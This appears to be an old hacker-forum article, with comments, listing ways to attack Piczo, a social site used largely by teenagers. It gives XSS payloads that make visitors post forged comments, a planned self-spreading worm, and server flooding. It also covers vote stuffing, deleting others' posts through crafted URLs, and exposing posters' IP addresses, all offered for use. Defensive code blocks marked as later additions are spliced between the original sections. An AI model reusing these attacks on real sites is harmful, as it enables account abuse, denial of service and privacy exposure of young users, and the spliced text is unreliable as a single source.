
Various Piczo vulnerabilities


By ghostghost | 7066 Reads |

This is basically a list of all the vulnerabilities and possible methods of attack I have found in the Piczo system. Although some of these may have been found and discovered by other people, I have not stolen these off anyone.

Piczo is a social networking site mostly used by children aged 13-17, and is very poorly coded. There are even spelling mistakes in their code! :O Piczo currently has seven servers.

Most of the ways to exploit Piczo involve JavaScript injection and in-URL hacking, where the URL string is modified, and hence different data is sent to the Piczo servers.

1.A) Comment board XSS attacks

This is probably the biggest threat to Piczo sites at the moment. All comment boards are currently vulnerable to cross-site scripting, that is, you can post your own code, and it will be executed on the user’s machine when they view the site. I discovered this vulnerability just the other day, but I’m not sure if anyone else knows about it. I heard another guy called ProRatHack was also hacking comment boards or something :s

So what can we do with xss on Piczo? Well, you could be a lame n00b and use it for making alerts and pop up boxes on the person’s site, but that wouldn’t be too cool. Here’s the code for it anyway if you want to see it:

<SCRIPT LANGUAGE = "JavaScript">alert(" the text goes here");</SCRIPT>

As you can see it’s pretty simple, just define the code type and do what you want. Don’t forget you can string JavaScript commands together with a semi-colon. You could also use JavaScript to make the person’s comment board frame redirect to another site (think shock sites ;), and I’m sure you could also affect the parent frame, but I can’t be bothered to explain that now.

Okay, that’s the lame stuff out of the way, think about who normally uses Piczo…logged in Piczo users! And think…they will probably be logged in when they view the comment board…we could redirect them to a cookie stealer and take their session ids sure, but there is an easier and more fun attack we can try…

1.B) Comment board XSS attacks – faking

We can post messages as other users, or actually make them automatically post messages when they are viewing the infected comment board. First you have to understand how it works:

http://pic6.piczo.com/go/commentonboard?cb=6295256&cbo=3245787&commentername=Santa&text=hello

Piczo comments for comment boards get sent to the servers in a URL, very insecure. Now of course, we can change the name that is displayed, but that would be too easy and not very fun. Instead, we can make a logged-in Piczo user that visits the site get redirected to the URL that posts messages, so if you used the window.location command (window.open is not suitable here as most people have pop-up blockers), they would appear to be posting the message, as the server is getting sent a request from their logged-in account ;)

So all we have to do is place one infected bit of code into the comment board, and anyone that visits the site will unwittingly post hundreds if not thousands of messages, and because there is no word limit on the comments, you can bomb the Piczo servers with data by doing this, hopefully resulting in a primitive form of DoS, basically using up all their bandwidth, or even all their physical storage capacity.

So the resulting code would look like this:

<SCRIPT LANGUAGE = "JavaScript"> window.location="http://pic6.piczo.com/go/commentonboard?cb=6258415&cbo=3928113&commentername=Santa&text=awwww you were hacked";</SCRIPT>

Of course, you would need to change the number after pic# (to define the server with the comment board you want to infect), the cb code, and the cbo code. Of course, you could make the other users post the code as well, which would make the code self replicating, and almost impossible to kill. At the moment I’m working on a better fully fledged version of this code, which will scout out other Piczo sites by scanning the friends’ list on the site, and hopefully spreading through all of Piczo.
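The two flaws behind sections 1.A and 1.B are unencoded output and a state-changing request that a plain URL can trigger. The following is an added example of how a server would close both; it is not Piczo's code or part of the original article, and every function name, the session shape and the 500-character limit are assumptions made for illustration.

```javascript
// Added example: hardened comment-board handlers. All names are hypothetical.

// Encode the five HTML-significant characters so stored text renders as text.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Output side: every user-controlled field is encoded before it reaches the page.
function renderComment(comment) {
  return '<div class="comment"><b>' + escapeHtml(comment.name) + '</b>: ' +
         escapeHtml(comment.text) + '</div>';
}

// Token comparison with no early exit on the first mismatching character.
function tokensMatch(a, b) {
  if (typeof a !== 'string' || typeof b !== 'string' || a.length !== b.length) return false;
  let diff = 0;
  for (let i = 0; i < a.length; i++) diff |= a.charCodeAt(i) ^ b.charCodeAt(i);
  return diff === 0;
}

const MAX_COMMENT_LENGTH = 500; // constructed limit; the article notes there was none

// Input side: posting is a state change, so it must be a POST carrying the
// per-session anti-CSRF token (assumed to be a random value set at login).
// The displayed name comes from the session, not from a request parameter.
function handlePostComment(req, board) {
  if (req.method !== 'POST') return { status: 405, error: 'POST required' };
  if (!req.session || !req.session.user) return { status: 401, error: 'login required' };
  const body = req.body || {};
  if (!tokensMatch(body.csrfToken, req.session.csrfToken)) {
    return { status: 403, error: 'bad CSRF token' };
  }
  const text = String(body.text || '');
  if (text.length === 0 || text.length > MAX_COMMENT_LENGTH) {
    return { status: 400, error: 'comment length out of range' };
  }
  board.push({ name: req.session.user, text });
  return { status: 201 };
}
```

With these checks a redirect to the posting URL is refused because it is a GET without the token, and a stored script tag is displayed as literal text.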

2. Piczo ratings system

Okay, you know those little boxes that people put on their sites, to make you vote for them, the type where there is a row of stars and the voting is instant? These are easy to fuck up. All you have to do is view source for the page on which the ratings box is, and then search (Ctrl + F) for ‘ratingsForm’, and it should hopefully lead you to something that looks like this:

<form id="ratingsForm348705431" name="website_1-10" action="http://pic4.piczo.com/go/ratemysite" method="POST">
  <input type="hidden" name="rating_id" value="57752" />
  <input type="hidden" name="rating_score" value="10"/>
  <input type="hidden" name="rating_method" value="component">
  <input type="hidden" name="elapsed" value="0"/>
</form>

See what it’s doing? It’s sending data to the address ‘http://pic4.piczo.com/go/ratemysite’, and this is what the url would look like with the data affixed:

http://pic4.piczo.com/go/ratemysite?rating_id=57752&rating_score=10&rating_method=component&elapsed=0

How easy was that? Lol. So basically, we can change that all we want before it gets sent to the server. We can change ‘rating_score’ to 1, and vote for one star in the ratings box, and that url can be used for any ratings box with a little adjustment, all that needs to be changed is that pic# server identifier at the start, and the rating_id, which defines which ratings box to vote for. Also remember to change the ‘elapsed’ value to something like 20 000.

Now, how to vote for this site millions of times? The data telling Piczo whether you have voted for a certain site already is stored in a cookie, silly Piczo. So just disable cookies in your browser (use the Web Developer extension for Firefox), and go to your voting URL. Then just keep refreshing it to vote multiple times. But that would take long, so download the ‘reload every’ extension for Firefox and open that voting URL in about 20 tabs. Then set each tab to reload once every minute.
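The ratings weakness in section 2 comes from trusting the client twice: for the "already voted" flag kept in a cookie, and for the hidden-field score. The following is an added example of server-side vote accounting, not Piczo's code or part of the original article; the class, the voter ids and the 1 to 10 score range (inferred from the form name "website_1-10") are assumptions.

```javascript
// Added example: server-side vote accounting. Names and limits are hypothetical.
const MIN_SCORE = 1, MAX_SCORE = 10; // assumed range, from the form name "website_1-10"

class RatingBox {
  constructor() { this.votes = new Map(); } // voterId -> score

  // voterId must come from the authenticated session, never from a cookie flag
  // or request parameter the client can drop or rewrite. Client-supplied fields
  // such as "elapsed" are not consulted at all.
  castVote(voterId, rawScore) {
    if (!voterId) return { ok: false, reason: 'login required' };
    const score = Number(rawScore);
    if (!Number.isInteger(score) || score < MIN_SCORE || score > MAX_SCORE) {
      return { ok: false, reason: 'score out of range' };
    }
    if (this.votes.has(voterId)) return { ok: false, reason: 'already voted' };
    this.votes.set(voterId, score);
    return { ok: true };
  }

  average() {
    if (this.votes.size === 0) return null;
    let sum = 0;
    for (const s of this.votes.values()) sum += s;
    return sum / this.votes.size;
  }
}

// Constructed replay: the same vote request repeated, as with cookies disabled.
function replayDemo() {
  const box = new RatingBox();
  const results = [];
  for (let i = 0; i < 3; i++) results.push(box.castVote('user-42', '1').ok);
  results.push(box.castVote(undefined, '10').ok); // anonymous request
  results.push(box.castVote('user-7', '11').ok);  // out-of-range score
  results.push(box.castVote('user-7', '9').ok);
  return { results, count: box.votes.size, average: box.average() };
}
```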

3. Lots of hits for your site

Too easy. Use an HTTP Traffic generator. www.nsauditor.com/web_tools_utilities/http_traffic_generator.html Just download the program, enter the site address, and start it. Nothing could be simpler.

4. Shoutbox ‘hacking’

Shoutboxes are very easy to destroy or ruin. You can delete other people’s posts.

  1. Find the URL of the shoutbox, as you will need to view the actual generated source code for the shoutbox, so go on the Piczo page with the shoutbox, and view source for it, search for ‘go/shoutbox?sb=’, which should lead you to a URL that looks like this (it’s tucked away in some iframe tags): http://pic6.piczo.com/go/shoutbox?sb=4780380&sbo=3245787

  2. Now that you have that, navigate your browser to it, and you should see only the full shoutbox on your screen. Now, view source again, and scroll down and look for the messages. Each message will have a unique postView number. Now copy down the numbers for the messages you want to delete, and stick them in this URL: (first you need to replace the sb and sbo numbers with the ones from the shoutbox URL you just used, and also use the correct pic# server identifier number, same as your shoutbox URL from just now) Put the postView number of the message in the plpid parameter in the URL string, now navigate your browser to it, and the message should get deleted.

http://pic6.piczo.com/go/editpostapproval?dba=y&shout=y&sbo=3245787&sb=4780380&plpid=46370739&approvalstatus=delete

4.B) Fun but a bit useless

You still have the shoutbox URL from earlier, right? The one that looked like http://pic6.piczo.com/go/shoutbox?sb=4780380&sbo=3245787 ? If so, just add ‘&isedit=y’ to the end of the address, so it looks like this:

http://pic6.piczo.com/go/shoutbox?sb=4780380&sbo=3245787&isedit=y

Now, navigate to the new address. What do you notice? You can see the IP addresses of all the posters and also any messages that have been disapproved or hidden by the actual site owner :P

Also, you can add ‘&showWelcomeMessage=y’ to the end of the URL to show the ‘you are logged in’ message.

5. Guestbook ‘hacking’

Guestbooks can be ‘hacked’ using the same method described for the shoutbox trick. If you can’t work out how to modify the method to use it with guestbooks, you don’t deserve to have a computer. You can also use the JavaScript method, that is: deletePost(46372066) And replace the number with the correct one.
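The shoutbox and guestbook issues in sections 4, 4.B and 5 share one root cause: the server acts on identifiers and mode flags in the URL without checking who is asking. The following is an added example of the missing owner checks, not Piczo's code or part of the original article; the data, handler names and request shape are constructed for illustration.

```javascript
// Added example: owner checks for moderation actions. All names are hypothetical.
// Constructed data: one shoutbox with two posts (IPs from the documentation range).
const shoutboxes = new Map([
  ['sb-1', { owner: 'alice', posts: [
    { id: 'p1', author: 'bob', ip: '192.0.2.10', text: 'hi', hidden: false },
    { id: 'p2', author: 'eve', ip: '192.0.2.20', text: 'spam', hidden: true },
  ] }],
]);

function isOwner(session, box) {
  return Boolean(session && session.user && session.user === box.owner);
}

// Deleting is allowed only for the authenticated owner; knowing the board id
// and post id is not proof of authority. An anti-CSRF token check would sit
// alongside the method check.
function handleDeletePost(req) {
  if (req.method !== 'POST') return { status: 405 };
  const box = shoutboxes.get(req.params.sb);
  if (!box) return { status: 404 };
  if (!isOwner(req.session, box)) return { status: 403 };
  const before = box.posts.length;
  box.posts = box.posts.filter((p) => p.id !== req.params.postId);
  return { status: box.posts.length < before ? 200 : 404 };
}

// The edit view is decided from the session, so a client-supplied isedit=y
// cannot switch it on. Visitors get neither IP addresses nor hidden posts.
function viewShoutbox(req) {
  const box = shoutboxes.get(req.params.sb);
  if (!box) return { status: 404 };
  const editMode = req.params.isedit === 'y' && isOwner(req.session, box);
  const posts = box.posts
    .filter((p) => editMode || !p.hidden)
    .map((p) => (editMode ? { ...p } : { id: p.id, author: p.author, text: p.text }));
  return { status: 200, editMode, posts };
}
```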

There are many more ways to ruin Piczo but I can’t be bothered to write any more.

Comments
ghost 17 years ago

Pretty good, but why is it in Windows XP Tweaks?

ghost 17 years ago

Nice article. And @ender, it's probably because that's the default set when you try to submit an article, so he probably forgot to change it. But other than that, good article, it covers a lot of different varieties.

What_A_Legend 17 years ago

Also there is also another article on Piczo exploits and I don't really see a need to do any of these hacks.

ghost 17 years ago

Sorry for all the spelling mistakes and forgetting to change category

ghost 17 years ago

I fixed the placement…now under webhacking…w00t. Nice article btw

ghost 17 years ago

I really like this article. I didn't try, but you found good exploits. Peace

Flaming_figures 17 years ago

Oh, btw, I never thought to put this in my article, but web dev is your best friend since they attempted to fix the exploit by putting the box in frames and stuff. (mozilla firefox web developer add-on is the best!)

R3M0T3 H4CK3R 16 years ago

Almost 3 years ago I found some of those exploits for Piczo and sent them patches, obviously they still haven't done anything about them. Honestly their coders are so incompetent it's almost criminal.

ghost 16 years ago

this article is shit :@

Night_Stalker 16 years ago

Dude, I could have copied and pasted various piczo hacking articles and said I wrote it too :)

And who here actually wants to hack piczo, I also sent them the exploits, and a simple script they could use as a temporary patch. They didn't use mine… But they at least fixed SOME of the vulnerabilities… only SOME… :D